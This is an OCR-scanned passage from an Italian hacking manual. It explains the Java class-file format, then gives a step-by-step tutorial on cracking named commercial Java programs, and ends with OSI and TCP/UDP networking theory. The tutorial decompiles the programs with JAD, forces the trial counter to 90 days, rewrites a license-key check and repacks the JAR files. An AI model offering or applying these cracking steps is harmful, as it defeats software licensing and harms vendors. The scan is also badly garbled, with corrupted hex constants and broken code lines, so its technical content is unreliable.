oppure tra 0xfff0o00000000000I1L e OxfffffffffififififfififiL , il valore e un Nan. 

Negli altri casi 


int s = ((bits >> 63) == 0) ? 1 :: -1; 
int e = (int)((bits >> 52) & 0x7ffL); 
long m = (e == ? 
(bits & OxfffffffffffffL) << 1 : 
(bits & OxfffffffffffffL) | 0x10000000000000L; 


Il valore viene dato da S * M * 2 A (E - 1075) 
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Nel caso di un RONSTANTENaAnESANGMyBS la struttura sara’ 


CONSTANT_NameAndType_info { 
ul tag; 
uz name_index; 
u2 descriptor_index; 


} 


I valori name_index e descriptor_index sono sempre indici nella CPT. 

rappresenta le stringhe relative ai nomi dei methodi, alle 
variabili ecc. 
Grazie al suo metodo di trattamento riesce con un byte a rappresentare caratteri 
fino a 16 bits. 
Da 0x01 a 0x7F sono utilizzati gli 8 bits 
I caratteri da 0x80 a 07ff invece usano una parte x e una y per la 
rappresentazione. 


X 1 1 1 0 bits 6-10 
Y 1 0 bits 0-5 


I bytes rappresentano il carttere con il calcolo ((X & Ox1f) << 6) + (Y & Ox3f) 
I caratteri da 0x800 a Oxffff invece sono rappresentati con 


1 1 1 0 bits 12-15 
1 (0) bits 6-11 z: 1 (0) bits 0-5 
Il calcolo sara’ ((x & Oxf ) << 12 ) + ((y & Ox3f ) << 6 ) + (z & Ox8f ) 


L’ access_flag invece e’ la maschera da cui si ricavano gli attributi della 
classe. 


Flag Name Value Meaning Used By 
ACC_PUBLIC Ox0001 Is public; may be 
accessed from 
outside its 
package. Class, 


interface 
ACC_FINAL Ox0010 Is final; no 
subclasses allowed. 
Class 
ACC_SUPER 0x0020 Treat superclass 


methods specially 
in invokespecial 
Class, interface 


ACC_INTERFACE 0x0200 Is an interface. 
Interface 
ACC_ABSTRACT 0x0400 Is abstract; may 
not be 
instantiated. 


Class, interface 


This_class rappresenta l’ indice nella CPT da cui si ricava il nome della 
classe. 

Super_class e’ l’ indice nella CPT da cui si ricava il nome della super classe, 
in pratica l’ extends utilizzato (se utilizzato). 

Interfaces_count invece e’ il numero delle interfacce. 

Mediante questo numero si eseguiranno N letture ognuna delle quali restitura’ il 
numero di un ingresso nella CPT da cui ricavare i vari implements. 

Rivediamo il codice 


this_class = in.readUnsignedShort(); 
tmp = (decompJavaData) classTable.elementAt(this_class); 
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thisClassName = new String(tmp.str); 
strBuf.append(thisClassName); 
textfield1.append(strBuf.toString()); 


super_class = in.readUnsignedShort(); 

if(super_class != 0) { 
tmp = (decompJavaData) classTable.elementAt(super_class); 
textfield1.append(" extends "); 
tmpStr = removeSlash(tmp.str); 
textfield1.append(extractClassName(tmpStr)); 


} 


interfaces_count = in.readUnsignedShort(); 
if(interfaces_count != 0) { 
textfield1.append(" implements "); 
for(idx = 0; idx != interfaces_count;idx++) { 
name_at = in.readUnsignedShort(); 
tmp = (decompJavaData) classTable.elementAt(name_at); 
if(idx > 0) { 
textfield1.append(", "); 
} 


tmpStr = removeSlash(tmp.str); 
textfield1.append(extractClassName(tmpStr)); 


} 
textfield1.append("\n{\n"); 
} 


Come si puo’ vedere this_class legge il numero d’ ingresso nella CPT e lo legge. 
Successivamente legge supr_class e va a ricavare il nome dell’ extends. 

A seconda del numero d’ interfacce, interfaces_count, esegue N letture e dopo 
aver reperito il nome nella CPT lo appende dopo la stringa implements. 

Lo stesso discorso vale per la parte che segue relativo alle variabili. 

Il campo fields_count dice quanti ingressi legati a a variabili sono presenti 
nel file .class 

Per ogni ingresso si dovranno leggere i seguenti dati rappresentati dalla 
struttura : 


field_info { 
u2 access_flags; 
uz name_index; 
u2 descriptor_index; 
u2z attributes_count; 
attribute_info attributes[attributes_count]; 


} 


Il flag d’ accesso specifica gli attributi della variabile (e’ una maschera) e 
precisamente: 


Flag Name Value Meaning and Used By 
ACC_PUBLIC OxO001 Is public ; may be 
accessed from 
outside its 
package. Any field 


ACC_PRIVATE 0x0002 Is private ; usable 
only within the 
defining class. 
Class field 


ACC_PROTECTED 0x0004 Is protected ; may 
be accessed within 
subclasses. Class 
field 


Pagina 434 di 991 


ACC_STATIC 0x0008 Is static . Any 
field 


ACC_FINAL Ox0010 Is final ; no 
further overriding 
or assignment after 
initialization. Any 


field 
ACC_VOLATILE 0x0040 Is volatile; cannot 
be cached. Class 
field 
ACC_TRANSIENT 0x0080 Is transient ; not 


written or read by 
a persistent object 
manager .Class field 


Descriptor_index rappresenta l’ ingresso nella CPT relativo al tipo. 

Per l’ identificazione riferitevi alla tabella precedente. 

Ricordatevi che ad esempio una variabile long sara’ specificata con Z. 
Attributes_count e’ il numero di attributi associati alla variabile ed espressi 
dalla struutura 


attribute_info { 
u2z attribute_name_index; 
u4 attribute_length; 
u1 info[attribute_length]; 


} 


Simile e’ anche il discorso dei metodi. 
Methods_count e’ il numero di metodi presenti nella classe. 
La struttura da cui si ricaveranno le informazioni e’ la seguente. 


method_info { 
u2 access_flags; 
uz name_index; 
u2 descriptor_index; 
u2 attributes_count; 
attribute_info attributes[attributes_count]; 


} 
access_flags rappresenta anche i questo caso gli attributi. 
Flag Name Value Meaning Used By 
ACC_PUBLIC Ox0001 Is public ; may be 


accessed from 
outside its 
package. Any method 


ACC_PRIVATE 0x0002 Is private ; usable 
only within the 
defining class. 
Class/instance 
method 


ACC_PROTECTED O0x0004 Is protected ; may 
be accessed within 
subclasses.Class/in 
stance method 


ACC_STATIC 0x0008 Is static 
Class/instance 
method 


ACC_FINAL Ox0010 Is final ; no 
overriding is 
allowed. 

Class/instance 
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method 


ACC_SYNCHRONIZED 0x0020 Is synchronized ; 
wrap use in monitor 
lock. 
Class/instance 
method 

ACC_NATIVE Ox0100 Is native ; 
implemented in a 
language other than 
Java.Class/instance 
method 


ACC_ABSTRACT 0x0400 Is abstract ; no 
implementation is 
provided. Any 
method 


Il nome viene reperito dalla CPT mediante name_index mentre gli argomenti e le 
tipologie di ritorno mediante descriptor_index. 
Un metodo del tipo 


Object nome_metodo(String, int) 
Viene rappresentato con 
(Ljava/lang/String;I)Ljava/lang/0Object; 


La funzione analizeMethod() passandogli la stringa come quella appena vista e il 
nome del metodo restituisce la sua notazione normale. 

Se voleste andare ad impelagarvi nella traduzione del codice allora dovrete 
andare a leggere le strutture attribute count e attribute_info che finiscono la 
struttura. 

Per un approfondimento consiglio gli scritti di Tim Lindholm, Frank Yellin 
della JavaSoft. 


SEMPLICE SPROTEZIONE CON JAD 


In ogni caso quando si cerca di sproteggere un programma JAVA l’unico modo è 
quello di seguirne il flusso. 

Un notissimo CASE è distribuito in versione DEMO con la limitazione di 60 giorni 
di funzionamento. 

I files del programma sono tutti contenuti in due files .JAR. 

Per prima cosa bisogna riportare fuori da questi archivi i files .CLASS mediante 
le utility fornite con il JDJ. 

I due files sono 


JIDPMAin.jar 
JIbPSingle.jar 


Mediante il comando 
jar -x JDPMain.jar *.class 


riportiamo i files alla normalità. 
I Per capire dove viene fatto il controllo 
sulla data bisogna partire dall’inizio. 
Per sapere in quale modulo c’è l’entry 
Deznazziona:  [jvisnere JDesionePio Hig/Favio Designer Pio? 1001 point analizziamo le proprietà presenti 
dentro all’icona windows da cui si esegue 
il programma. 


Percorso Window 
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La stringa è la seguente 
C:\Windows\wjview.exe JDesignerPro http://Flavio/JDesignerPro/ 01001 


Esiste in circolazione un programma chiamato JAD.EXE il quale decompila i file 
.CLASS restituendo il file .JAVA 


N Prompt di MS-DOS 


»3 Ceplitstr) 
confirmation 


Cpackimports) 


one line «packfields) 


1) 


Iniziamo a creare il sorgente del modulo da cui parte il programma ovvero quello 
riportato nella linea di comando. 
Il file è JdesignerPro.class. 


Jad JdesignerPro.class JdesignerPro.java 


Una volta ricavato il sorgente partiamo dall’inzio per vedere in che punto è 
inserito il controllo. 
Possiamo comunque cercare alcune stringhe come ad esempio 


license, day, expire ecc. 
In questo caso cercando day troiveremo subito il controllo. 


k1 = jaggSQL.execSQL(s6, vector); 
} 


} 

if(k1 < 0) 
daysRemaining = 1; 

String s7 = ""\\"; 

if(JDPCompiler.index0f("/") >= 0) 
s7 = u/Me 

if(daysRemaining == 0 && JDPJagg.useJaggServer && JDPJaggDir == null) 
getUnixDaysRemaining(); 

if(daysRemaining == 0 && JDPJagg.useJaggServer && k1 > 0 && JDPJaggDir != 


{ 


Sarà sufficente inserire la linea 


null) 


k1 = jaggSQL.execSQL(s6, vector); 
j 


} 
if(k1 < 0) 
daysRemaining = 1; 
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daysRemaining = 90; 
String s7 = ""\\"; 


Potremmo complicarci la vita andando a cercare la routine vera e propria che 
deriva dall'esecuzione dell’interrogazione della prima linea, ma non ne vale la 
pena. 

Ora ricompilamo il sorgente con 


javac JDesignerPro.java 
ed inseriamo il file .CLASS ricavato nel file da cui lo avevamo estratto con 
jar -u JDesignerPro.jar JDesignerPro.class 


Molti programmi cercano di complicare le idee dando nomi strani ai metodi per 
cui i programmi sono lunghe seuquenze di nomi del tipo 


000(); 
iie(); 
aii(); 


In questo caso mediante l’opzione Replace dell'editor usato per visualizzare il 
sorgente cambieremo i nomi cercando di assegnarne altri meno confusionari. 

Una volta individuati i metodi potremmo cercare di capirne lo scopo e quindi 
potremmo successivamente assegnargli dei nomi conformi al loro scopo. 

In ogni caso ricordatevi sempre di tenere ostto analisi il sistema durante 
l’installazione dei programmi per vedere che valori questi settano dentro al 
registro di windows. 

Nel capitolo in cui si parlava dei vari software avevo riportato un 
disassemblatore Java scritto in ADA anche se di fatto JAD non mi ha mai lasciato 
a piedi. 

Con java le cose sono abbastanza semplici in quanto le conoscenze necessarie 
sono quelle legate ai vari software per la creazione delle librerie .JAR e .CAB 
dalle quali estrapolare i file .class da modificare e nelle quali inserire i 
.class modificati. 

Un esempio pratico per mostrare la semplicità delle sprotezioni di programmi 
JAVA. 

Il programma in questione è un famoso generatore di Applets (ce ne sono 
centinaia per cui non violo nessuna legge a definire la tipologia del software 
in esame). 

Il programma è incluso dentro ad un certo numero di files .JAR. 

Creo una directory in cui inserire i software .class estratti con l’utility di 
compattazione di JDK. 

Tra i files .class 
estratti risualtano 
subito emblematici 


<UP-—DIR D preskey.class 
ocekey.class 
navkey.class 
compkey.class 


Quel key presente in 
tutti i nomi è stato 
quello che ha attirato 


la mia attenzione. 


Li copio in una directory a parte e per evitare di dare 4 volte il comando JAD 
imbastisco da DOS la seguente riga (un semplice for da DOS) 


c:\> for %a in (*.class) do JAD %a 
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Il risultato sono quattro files .jad (Java Disassembled) che volendo possiamo 
rinominare .java. 
Il contenuto di un file, compkey.java è il seguente 


// Decompiled by Jad v1.5.5.3. Copyright 1997-98 Pavel Kouznetsov. 


// Jad home page: http://web.unicom.com.cy/-kpd/jad.html 
// Decompiler options: packimports(3) 
// Source File Name: C:\Windows\besktop\composer\compkey.java 


import java.net .URL; 
class compkey 


public static String getkey(String note, URL u) 


{ 
String regURL[] = new String[5]; 
regURL[0] = "opencube"; 
regURL[1] = "jesse"; 
regURL[2] = "localhost"; 
regURL[3] = "appletcomposer"; 
regURL[4] = "dev"; 
int i; 
for(i = 1; Character.isDigit(note.charAt(note.length() - i)); it+); 
if(u.getProtocol().equalsIgnoreCase("file")) 
return note.substring(0, (note.length() - i) + 1).trim(); 
for(int j = 0; j < regURL.length; jt++) 
if(u.getHost().toLowerCase().indexOf(regURL[j], 0) != -1) 
return note.substring(0, (note.length() - i) + 1).trim(); 
return "-1"; 
} 
compkey() 
{ 
} 


i; 


Il file modificato diventa come il seguente. 


// Decompiled by Jad v1.5.5.3. Copyright 1997-98 Pavel Kouznetsov. 


// Jad home page: http://web.unicom.com.cy/-kpd/jad.html 
// Decompiler options: packimports(3) 
// Source File Name: compkey.java 


import java.net .URL; 
class compkey 


public static String getKkey(String s, URL url) 


{ 
String as[] = new String[2]; 
as[0] = "saintly"; 
as[1] = "tex99"; 
int i; 
for(i = 1; Character.isbigit(s.charAt(s.length() - i)); it+); 
if(!url.getProtocol().equalsIgnoreCase("DIEGATESDIE")) 
return s.substring(0, (s.length() - i) + 1).trim(); 
for(int j = 0; j < as.length; j++) 
if(url.getHost().toLowerCase().indexOf(as[j], 0) != -1) 
return s.substring(0, (s.length() - i) + 1).trim(); 
return "-1"; 
} 
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compkey( ) 
{ 
} 


Ne ho riportato solo uno in quanto gli altri sono simili a questo ed in ogni 
caso non è importante riprodurli in questo luogo. 

A questo punto è sufficiente analizzare il codice e vedere in quale modo viene 
composta la chiave o si può sostituire le routine che ritornano vero o falso a 
seguito del fatto che il software sia registrato o meno, ricompilare il tutto e 
reinserire i file .class dentro ai files .cab o .jar originali. 

Sottolineo ANALIZZARE IL CODICE in quanto qui più che mai si tratta di farlo. 

In questo caso si doveva anche andare a vedere dove veniva fatta la chiamata in 
quanto gli argomenti passati al metodo getKkey() sono fondamentali. 

Un trucco per sapere dove viene fatta qualche chiamata è il seguente. 

Esiste un utility che ultimamente alcune riviste hanno fornito in versione 
completa su CD. 

Questa utility è FindIt! la quale, passandogli dei percorsi come argomenti, 
riesce a creare indici con le parole trovate nei files. 

In altre parole prendete i files del programma e li mettete in una directory. 

A questo punto avete tutti i files .class in un certo punto del disco. 

Mediante il comando DOS che ho riportato prima decompilate tutti i files .class. 


C:\> For %a in (*.class) do jad %a 
Ora se volte potete rinominare tutti i file .jad in .java 
C:\> Ren *.jad *.java 


Da sotto Windows lanciate FindIt! e fategli creare un indice con tutte le parole 
che si trovano nei file .java situati in quella directory dove avete appena 
lavorato. 

Avendo tutti i sorgenti potete utilizzare qualche utility per creare un cross 
reference del tutto. 

Magari questa funzione è implementata in qualche sistema di sviluppo Java. 
Comunque, per tornare a FindIt!, a questo punto tracciate il programma e se ad 
un certo punto vi interessa sapere dove c’è una qualche chiamata ad un metodo, 
getKey() ad esempio, potete usare la funzione di FIND di FindIt! il quale 
clickando sul file mostrato, dove si trova il riferimento, vi posizionerà 
direttamente in edit. 

Personalmente uso FindIt! per tanti scopi simili come ad esempio con il grosso 
archivio FAQ di Microsoft che vengono fornite come tanti files .TXT posizionati 
in un albero di directory abbastanza complesso. 

Quando cerco un argomento con questo programma lo trovo immediatamente. 

Poi di fatto esistono tante altre utility che creano un Altavista locale, un 
motore di ricerca, sul vostro computer. 

Molte funzioni legate alla serializzazione vengono fatte nei programmi java 
tramite metodi che svolgono funzionalità di rete. 

Guardate nell’esempio precedente i vari URL, u.getProtocol() ecc. 

Nel presente volume ho voluto inserire una parte di programmazione di rete 
tramite Java anche per aiutare a comprendere certe funzioni e non solo per il 
motivo di permettere la creazione di un libreria di metodi per l’accesso alla 
rete. 
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CONTROLLO DELLA RETE 


JAVA possiede delle classi che permettono la programmazione di rete per cui 
penso che sia il linguaggio più idoneo per creare software agganciati a questa. 
Anche le librerie del Linguaggio C possiedono funzioni potenti a riguardo degli 
accessi al protocollo TCP. 

Per scrivere software che utilizzassero la rete le soluzioni erano diverse. 

La prima riguardava certe librerie come ad esempio SuperTCP. 

Queste librerie o ActiveX che siano forniscono funzionalità per accedere alla 
rete, possono essere utilizzate da qualsiasi linguaggio, ma possiedono il 
problema di essere a pagamento. 

Il VisualC possiede delle classi MFC per l’accesso alla rete ma anche in questo 
caso il Visual C++ non è public domain. 

JDK invece è possibile prelevarlo dal sito SUN e tutte le classi per la gestione 
della rete sono interne alle classi fornite. 

Avevamo visto inizialmente dei password cracker ed altri software che usando 
bugs di FTP creavano accessi a sistemi remoti. 

Bene. 

Questi software possono essere anche facilmente scritti in Java grazie appunto a 
queste librerie. 

L'unica cosa è che bisogna conoscere qualche concetto di programmazione in rete. 
In questo capitolo tratterò sia le classi per l’uso della rete che la teoria 
legata a questa. 

Vedrete che tra le altre cose troverete divertente e rilassante l’uso di Java. 
Java faciliterà coloro che non conoscono il C e quando avranno imparato Java si 
renderanno conto che pasare al C++ sarà molto più semplice. 

Inoltre la scelta di Java è anche legata al fatto di non fare una scelta sulla 
‘storia’. 

Prima di iniziare a vedere l'argomento voglio sottolineare che la prima parte 
sarà relativa alla teoria della rete che è indipendente dal linguaggio. 

Il grosso successo di Java dipende sicuramente dal fatto che la pubblicità’ 
fattagli lo elegge a linguaggio per eccellenza per lo sviluppo di software per 
Internet. 

Lo stesso discorso e’ avvenuto con il protocollo TCP/IP la cui la strabiliante 
popolarità’ e’ derivata anche in questo caso al suo legame con Internet. 

Spesso il troppo parlare di certe cose fa nascere dei miti che alcune volte 
portano ad esagerare sulla vera essenza di una cosa oppure spingono a utilizzare 
delle parole senza di fatto conoscerne il vero significato. 

Java e TCP/IP costituiscono due esempi di un caso e dell’ altro. 

Il primo e’ stato talmente pubblicizzato legato a Internet che sembra quasi che 
l’ unico problema relativo alla scrittura di software per questa ultima sia 
quella di installare il compilatore. 

Una volta poi installato il tutto iniziano le varie “santificazioni” quando ci 
si accorge che il tutto non era poi cosi semplice in quanto iniziano a sorgere 
un infinita di “.questo non e’ possibile farlo perché il gestore della 
sicurezza non permette di ..”, “.non e’ permessa la scrittura su host perché..”, 
“.i1 protocollo ha problemi se si usano streams di ..”, ecc. 

Il secondo caso invece e’ costituito dal fatto che tutti parlano di TCP/IP ma 
pochi conoscono bene come questo funziona. 

Le filosofie orientali legate allo Zen (e all’ arte di programmare) parlano di 
“medianita’” ovvero della ricerca del punto di equilibrio. 

Alcuni concetti a volte sono veramente complessi e la loro conoscenza totale 
porterebbe ad impiegare eccessive forze in relazione agli obbiettivi che ci si 
prefiggono. 

Prendiamo ad esempio il protocollo TCP/IP (Transmission Control 
Protocol/Internet Protocol). 

La conoscenza globale pretenderebbe uno sforzo notevole in quanto l’ 
argomentazione e’ veramente complessa soprattutto se si scende a livello di 
progettazione. 

In ogni caso una buona conoscenza di alcuni principi di base permette di 
sopperire ad alcuni problemi che sorgono utilizzando Java in ambiente Internet. 


, 
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Infatti alcune limitazioni relative agli applets sono veramente pesanti quali ad 
esempio quelle legate all’ impossibilita’ di leggere e scrivere files ecc. 

Per rinfrescare la memoria riassumiamo qui le principali limitazioni di un 
applet. 


1. Java puo usare solo il proprio codice e non puo’ supportarsi su librerie 
esterne o utilizzare codice nativo di altra natura quali ad esempio il 
linguaggio C. 

2. Un applet non puo’ leggere o scrivere files. Nel caso della lettura alcuni 
browser la permettono utilizzando la specifica URL al posto del nome file 
(vedi a seguito la parte dedicata alle URL). La scrittura di file invece puo’ 
avvenire mediante tecniche di programmazione client/server tramite l’ 
utilizzo dei socket (vedi anche in questo caso il capitolo piu’ avanti 
dedicato ai socket). 

3. Una applet non può creare connessioni eccetto che con l’ host da cui 

proviene. 

Non puo’ eseguire programmi sull’ host. 

Non gli e’ permesso richiedere informazioni su alcune proprieta’ del sistema. 

Una dialog creata da un applet riporta la scritta che avvisa che la finestra 

e’ di proprieta’ dell’ applet stessa al fine di evitare la simulazione, ad 

esempio, di maschere in cui vengono richieste password e codici d’ accesso ad 

insaputa dell’ utente. 


OUIlsaA 


La conoscenza del funzionamento del protocollo e delle classi di rete permette 
di aggirare gli ostacoli che si creano a seguito delle precedenti limitazioni. 
Innanzi tutto : che cosa sono i protocolli ? 

I protocolli di comunicazione nascono dall’ esigenza di trasmettere dati su 
delle linee di comunicazione di diversa natura, controllandone la correttezza, 
in diversi ambienti, con un numero indefinito di partecipanti, con ambienti 
operativi differenti ecc. 

Inizialmente la problematica principale nasceva dall’ esigenza di controllare la 
correttezza dei dati trasmessi tra due sistemi collegati punto a punto. 

In pratica semplificando si potrebbe dire 


“Io ti trasmetto un numero X di dati in sequenza e mano mano che li invio eseguo 
la loro sommatoria. Finito di trasmetterteli ti invio la somma che ho calcolato. 
Tu mentre ricevi i dati da me inviati esegui la stessa somma. Se il valore che 
ti ho comunicato io alla fine e’ uguale a quello che hai calcolato mentre 
ricevevi dimmi di proseguire nell’ invio dei pacchetti se non avvertimi dell’ 
errore e fammi ripetere l’ invio degli stessi dati.” 


Questo era valido nel caso di connessioni fisiche punto a punto. 

Quando le connessioni iniziarono a riguardare reti con piu’ partecipanti il 
problema si estese in quanto il pacchetto che prima conteneva soltanto i dati e 
la somma per la verifica della correttezza dovette essere estesa includendo 
all’ interno di essa anche i dati relativi all’ indirizzo del mittente q uello 
del destinatarioi. 

Questo detto in tono semplicistico per far comprendere il principio di base dei 
protocolli. 

Esistono un infinita’ di protocolli destinati a problematiche e ad ambienti 
differenti. 

Molti protocolli sono particolari per ambienti LAN (Local Area Network - reti 
locali), altri per ambienti WAN (Wide Area Network - reti geografiche) mentre 
altri ancora, come il TCP/IP, sono in grado di offrire ottime prestazioni in 
ambedue gli ambienti. 

La forza di TCP/IP e’ dovuta proprio all’ equilibrio che questo ha in ambe due 
gli ambienti. 

Inoltre TCP/IP funziona in modo egregio in ambiente multi piattaforma e questo 
costituisce un altro dei suoi punti di forza. 

La sua origine, come moltissime altre tecnologie legate al campo del software e 
dell’ hardware, e’ legata al Ministero della Difesa USA come protocollo per l’ 
interconnessione di grandi mainframe. 
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Inizialmente la comunicazione tra i vari sistemi della ricerca finanziata dal 
Pentagono era in funzione di una rete telematica battezzata ARPANET la quale 
sfruttava il protocollo NCP (Network Control Protocol) per l’ interconnessione 
dei sistemi. 

Il passaggio dell’ uso del protocollo da NCP a TCP su ARPANET sancì l’ atto di 
nascita di Internet (nei primi mesi del 1983). 

Inizialmente TCP/IP era solo un insieme di protocolli che permettevano la 
connessione di computer differenti e di trasmettere dati tra di loro. 

I principi del protocollo TCP/IP erano stati comunque posti verso la meta’ 
degli anno 70 da Vinton Cerf e Robert Kahn. 

Una volta sentii dire : “.. gli standards sono belli perché ce ne sono tanti .. 
dovrebbe pero’ esserci uno standard per gli standards”. 

Anche nel caso delle reti si e’ tentato di definire degli standards e per fare 
questo sono nati degli appositi enti competenti. 

L’ autorità indiscussa nel campo delle reti e’ l’ ISO la quale ha emanato un 
modello di riferimento per regolare le comunicazioni tra computer mediante 
protocolli. 

Questo modello prende il nome di OSI (Open Systems Interconnection). 

Il modello OSI e’ stato progettato per aiutare i programmatori a creare 
applicazioni compatibili con diverse linee di prodotti multivendor e per fare 
questo prevede sette strati ognuno dei quali si interessa di una determinata 
tipologia di problematiche. 

I sette strati OSI sono i seguenti 


strato applicazione 

strato di presentazione 
strato di sessione 

strato di trasporto 

strato di rete 

strato di collegamento dati 
strato fisico 


Esiste un altro modello di riferimento che costituisce in un certo senso la 
versione condensata del modello OSI che si chiama DoD e che contempla quattro 
strati anzi che sette. 


Gli strati del modello DoD sono 


strato processo/applicazione 
strato host-to-host 

strato internet 

strato accesso alla rete 


LIVELLO APPLICAZIONE (OSI) 


Il livello di applicazione del modello OSI e’ quello in cui ritroviamo molti 
degli applicativi che sfruttano i componenti concernenti le comunicazioni. 

Tra le varie applicazioni che sfruttano questo strato troviamo i software WuW, 
le BBS e i motori di ricerca Internet come Altavista, Yahoo etc. 


Il livello di presentazione OSI ha lo scopo di presentare i dati al livello 
applicazione e questo viene fatto mediante alcuni standard che riguardano i 
contenuti multimediali come ad esempio le immagini. 

JPEG, MPEG, MIDI ecc. sono appunto alcuni di questi standard. 

Una nota lo merita il sistema Java per la definizione dei gestori di contenuto e 
di protocollo 


LIVELLO DI SESSIONE (OSI) 

Nello strato di sessione OSI la comunicazione viene organizzata in base a tre 
diverse modalità ovvero la Simplex (uno trasmette e un altro riceve), la Half 
Duplex (invio e ricezione dati a turno) e la Full Duplex (mediante un controllo 
del flusso dei dati tutti inviano e ricevono). 
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Sono inoltre gestite a questo strato l’ apertura della connessione, il 
trasferimento dei dati e la chiusura della connessione. I servizi del livello di 
trasporto hanno il compito di suddividere e di riassemblare le informazioni 
trattate a livello superiore e di convogliarle in un unico flusso di dati. 


LIVELLO DI TRASPORTO (OSI) 


A questo livello ritroviamo funzionalità quali quella di inviare al mittente un 
avviso di ricevuta dei pacchetti arrivati, di ritrasmettere ogni pacchetto non 
ritenuto valido, ricostruire la giusta sequenza dei pacchetti al loro arrivo, 
mantenere un corretto flusso di dati per impedire congestioni ecc. 

Da come e’ intuibile da quanto appena detto e’ di questo livello il sistema di 
controllo degli errori. 

Questo strato assegna ad ogni pacchetto di dati un numero di controllo che 
consente di eseguire la verifica dei dati giunti a destinazione. 

Tra i protocolli non OSI che troviamo a questo livello ci sono 


TCP, Novell SPX, Banyan VICP, Microsoft NetBios/NetBEUI, UDP 


Questo strato offre un livello di controllo dello spostamento delle 
informazioni tra sistemi. 


STRATO DI RETE (OSI) 


Definisce i protocolli di gestione del percorso sulla rete. 

Questo strato può analizzare l’ indirizzo dei pacchetti per determinare il 
metodo di instradamento più corretto. 

Se un pacchetto e’ destinato ad una stazione sulla rete locale viene inviato 
direttamente. 

Se invece il pacchetto e’ indirizzato ad un sistema presente su una rete posta 
su un altro segmento il pacchetto viene inviato ad un dispositivo chiamato 
router che si occupa di immetterlo in rete. 

I router, in breve, sono dispositivi che collegano la rete locale a quella 
geografica 

I protocolli che utilizzano questo strato sono 


IP (Internet Protocol), X 25, Novell IPX, Banyan VIP 
Ogni segmento che appartiene ad una rete (per segmento possiamo concepirla come 


una sotto rete) ha almeno un router che gli permette di dialogare con altre 
sotto reti. 


STRATO DI COLLEGAMENTO DATI (OSI) 


A questo livello vengono definite le regole per la trasmissione e la ricezione 
delle informazioni. 

Il fine di questo strato e’ quello di garantire che i messaggi vengano 
consegnati al dispositivo giusto e di tradurre i dati in bits in modo tale da 
poterli far trasferire dal livello fisico. 

Possiamo concepire questo strato come la porta tra il mondo hardware e software. 
Tra i protocolli più comuni che utilizzano questo strato ritroviamo HDLC, reti 
geografiche ATM, Microsoft NDIS ecc. 


lA 


STRATO FISICO (OSI) 


Le uniche due funzioni a questo livello sono quelle di trasmettere e ricevere 
bit tramite differenti tipi di infrastrutture e di dispositivi di trasmissione. 
Riassumendo potremmo fare una panoramica su tutte le operazioni che vengono 
fatte a ciascun livello sul pacchetto originale dei dati 
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e STRATO APPLICAZIONE Aggiunta indirizzo del nodo 
e STRATO PRESENTAZIONE Aggiunta informazioni codice 


e STRATO SESSIONE Aggiunta informazioni di comunicazione 

e STRATO DI TRASPORTO Aggiunta intestazione e checksum 

e STRATO DI RETE Aggiunta informazioni quantita’ e sequenza pacchetti 
e STRATO DI LINK Aggiunta checksum finale 

e STRATO FISICO Invio dati some sequenza di bit 


Ad ogni strato sono definite delle serie di funzioni specifiche con le quali l’ 
applicativo interagisce nell’ istante in cui ha bisogno di inviare delle 
informazioni ad un altro sistema della rete. 


La richiesta e le informazioni vengono impacchettate e inviate allo strato 
successivo il quale aggiunge al pacchetto le informazioni relative alle funzioni 
gestite a quel livello. 

Vediamo ora i quattro starti del modello DoD 


STRATO PROCESSO/APPLICAZIONE (DoD) 


Questo strato corrisponde ai primi tre del modello OSI. 

Gran parte del lavoro di trasmissione viene svolto a questo livello per cui 
vengono coinvolti un gran numero di protocolli. 
Tra i nomi piu’ comuni dei protocolli ritroviamo 
TELNET, FTP, SMTP, NFS, X WINDOW ecc. 

Telnet ad esempio e’ in pratica un emulazione di 
terminale. 5 
Tramite Telnet un client € puo’ accedere ad APPLICAZIONE (Aggiunta Indizz odo) APPUCADIONE 
un'altra macchina su cui e’ in esecuzione un : 

PRESENTAZIONE (Aggiunta informazione codice) ‘PRESENTAZIONE 
server Telnet e lavorare come se fosse un I 
terminale collegato direttamente. ra opa reo e 


FTP (File Transfer Protocol) e’ essenzialmente un di TRASPORTO 
protocollo di trasferimento files. “ss ca 
Questo protocollo puo’ essere utilizzato da un I 

altro software per il trasferimento di softwares malo cosi sie ___T_ 
oppure può fungere come programma indipendente e cia dec 
quindi eseguire la navigazione nelle directories 


del sistema a cui si e’ connessi, gestire il 
trasferimento files ecc. 

Vedremo successivamente le funzioni implementate nella libreria sun.net.ftp 
presente in Java. 

Ne programma di esempio utilizzeremo anche le classi di sun.net.smtp che sono 
quelle che gestiscono il protocollo che si interessa della gestione della posta 
elettronica (SMTP). 


STRATO HOST TO HOST (DoD) 


Le funzioni di questo livello sono paragonabili a quelle dello strato di 
trasporto del modello OSI. 

A questo livello vengono gestiti il controllo di integrita’ e della sequenza dei 
pacchetti trasmessi. 

Infatti e’ proprio a questo strato che incontriamo i 
protocolli TCP e UDP. 

Il protocollo viene caricato come si trattasse di un 


driver software. Application 
(HTTP, ftp, telnet, ...) 


PROTOCOLLO TCP Transponi 
(TCP, UDP, ...) 
Il protocollo TCP (Transmission Control Protocol) 
suddivide in segmenti i blocchi di informazioni generati 
da un software, li numera, li ordina in modo da permettere 


Network 
(P...Y 


Link 
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il riassemblaggio degli stessi una volta giunti a destinazione. 


La trasmissione di questi segmenti e’ subordinata alla ricezione di segnali di 
conferma atti a segnalare la corretta ricezione degli stessi. 

TCP e’ definito come protocollo orientato alla connessione in quanto prima di 
inviare i dati contatta il destinatario per stabilire la connessione creando un 
circuito virtuale. 

La trasmissione dei dati avviene, sommariamente, come avevamo visto 
precedentemente ovvero particolari algoritmi si interessano di verificare la 
correttezza dei pacchetti di dati per cui prima di eseguire un successivo invio 
il protocollo richiede conferma al destinatario. 

La comunicazione avviene in full duplex. 


PROTOCOLLO UDP 


Esistono alcune classi in Java che necessitano della conoscenza di un altro 
protocollo 

Il protocollo UDP (User Datagram Protocol) e 
viene utilizzato in alternativa a TCP. 

UDP invia in modo indipendente dei pacchetti di dati, chiamati datagrammi, da un 
applicazione ad un'altra senza garantirne l’arrivo. 

In questo caso l’ordine di invio non e’ importante in quanto ogni messaggio e’ 
indipendente uno dall’altro. 

Esistono delle applicazioni in cui il ricevimento dei pacchetti non e 
importante. 

Prendete ad esempio un sistema che invia in continuazioni informazioni sulla 
temperatura rilevata in una certa città. 

Se un sistema che desidera ricevere tali informazioni si perde un pacchetto non 
e’ una cosa cosi critica in quanto potra’ attendere un altro invio. 

Mentre TCP e’ basato sulla connessione UDP ne e’ indipendente ed e’ facile 
comprenderlo da quanto detto. 


l4 


un protocollo piu’ “leggero” che 


t4 


STRATO INTERNET 


